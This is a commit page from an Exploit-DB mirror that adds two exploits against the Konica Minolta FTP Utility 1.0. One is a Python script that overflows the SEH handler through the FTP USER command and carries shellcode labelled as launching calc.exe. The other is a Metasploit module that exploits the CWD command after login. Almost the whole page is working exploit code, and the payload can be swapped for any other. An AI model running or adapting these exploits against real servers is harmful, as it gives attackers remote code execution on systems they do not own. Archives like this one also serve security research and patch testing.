bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-09-22

Browse source 
2 new exploits
This commit is contained in:
Offensive Security 2015-09-22 05:03:00 +00:00
parent c6421d54c9
commit 06333ebc0c
3 changed files with 128 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
files.csv
View file

@ -34544,3 +34544,5 @@ id,file,description,date,author,platform,type,port
38249,platforms/multiple/dos/38249.txt,"MiniUPnP Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,multiple,dos,0 38249,platforms/multiple/dos/38249.txt,"MiniUPnP Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,multiple,dos,0
38250,platforms/multiple/remote/38250.html,"Novell Groupwise Client 8.0 Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote,0 38250,platforms/multiple/remote/38250.html,"Novell Groupwise Client 8.0 Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote,0
38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin 'id' Parameter Cross Site Scripting Vulnerability",2013-01-24,hiphop,php,webapps,0 38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin 'id' Parameter Cross Site Scripting Vulnerability",2013-01-24,hiphop,php,webapps,0
38252,platforms/windows/remote/38252.py,"Konica Minolta FTP Utility 1.0 - Remote Command Execution",2015-09-20,R-73eN,windows,remote,21
38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow",2015-09-21,metasploit,windows,remote,21

Can't render this file because it is too large.

46
platforms/windows/remote/38252.py Executable file
View file

@ -0,0 +1,46 @@
# Title: Konica Minolta FTP Utility - Remote Command Execution
# Date : 20/09/2015
# Author: R-73eN
# Software: Konica Minolta FTP Utility v1.0
# Tested: Windows XP SP3
# Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Every command is vulnerable to buffer overflow.
import socket
import struct
shellcode = ""#msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x5c\x2f"
shellcode += "\xbd\xfe\xbd\x27\xc9\xda\xd8\xd9\x74\x24\xf4\x5e\x29"
shellcode += "\xc9\xb1\x31\x31\x6e\x13\x83\xee\xfc\x03\x6e\xf1\x5f"
shellcode += "\xd2\x35\xe5\x22\x1d\xc6\xf5\x42\x97\x23\xc4\x42\xc3"
shellcode += "\x20\x76\x73\x87\x65\x7a\xf8\xc5\x9d\x09\x8c\xc1\x92"
shellcode += "\xba\x3b\x34\x9c\x3b\x17\x04\xbf\xbf\x6a\x59\x1f\xfe"
shellcode += "\xa4\xac\x5e\xc7\xd9\x5d\x32\x90\x96\xf0\xa3\x95\xe3"
shellcode += "\xc8\x48\xe5\xe2\x48\xac\xbd\x05\x78\x63\xb6\x5f\x5a"
shellcode += "\x85\x1b\xd4\xd3\x9d\x78\xd1\xaa\x16\x4a\xad\x2c\xff"
shellcode += "\x83\x4e\x82\x3e\x2c\xbd\xda\x07\x8a\x5e\xa9\x71\xe9"
shellcode += "\xe3\xaa\x45\x90\x3f\x3e\x5e\x32\xcb\x98\xba\xc3\x18"
shellcode += "\x7e\x48\xcf\xd5\xf4\x16\xd3\xe8\xd9\x2c\xef\x61\xdc"
shellcode += "\xe2\x66\x31\xfb\x26\x23\xe1\x62\x7e\x89\x44\x9a\x60"
shellcode += "\x72\x38\x3e\xea\x9e\x2d\x33\xb1\xf4\xb0\xc1\xcf\xba"
shellcode += "\xb3\xd9\xcf\xea\xdb\xe8\x44\x65\x9b\xf4\x8e\xc2\x53"
shellcode += "\xbf\x93\x62\xfc\x66\x46\x37\x61\x99\xbc\x7b\x9c\x1a"
shellcode += "\x35\x03\x5b\x02\x3c\x06\x27\x84\xac\x7a\x38\x61\xd3"
shellcode += "\x29\x39\xa0\xb0\xac\xa9\x28\x19\x4b\x4a\xca\x65"
banner = ""
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
nSEH = "\xEB\x13\x90\x90"
SEH = struct.pack('<L',0x1220401E)
evil = "A" * 8343 + nSEH + SEH + "\x90" * 22 + shellcode +"D" * (950 - len(shellcode))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server = raw_input('Enter IP : ')
s.connect((server, 21))
a = s.recv(1024)
print ' [+] ' + a
s.send('User ' + evil )
print '[+] https://www.infogen.al/ [+]'

80
platforms/windows/remote/38254.rb Executable file
View file

@ -0,0 +1,80 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Ftp
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow',
'Description' => %q{
This module exploits an SEH overflow in Konica Minolta FTP Server 1.00.
Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which
leads to an SEH overflow. Konica FTP allows anonymous access by default; valid
credentials are typically unnecessary to exploit this vulnerability.
},
'Author' =>
[
'Shankar Damodaran', # stack buffer overflow dos p.o.c
'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # seh overflow, metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EBD', '37908' ]
],
'Privileged' => false,
'Payload' =>
{
'Space' => 1500,
'BadChars' => "\x00\x0a\x2f\x5c",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 7 SP1 x86',
{
'Ret' => 0x12206d9d, # ppr - KMFtpCM.dll
'Offset' => 1037
}
]
],
'DisclosureDate' => 'Aug 23 2015',
'DefaultTarget' => 0))
end
def check
connect
disconnect
if banner =~ /FTP Utility FTP server \(Version 1\.00\)/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def exploit
connect_login
buf = rand_text(target['Offset'])
buf << generate_seh_record(target.ret)
buf << payload.encoded
buf << rand_text(3000)
print_status("Sending exploit buffer...")
send_cmd(['CWD', buf], false) # this will automatically put a space between 'CWD' and our attack string
handler
disconnect
end
end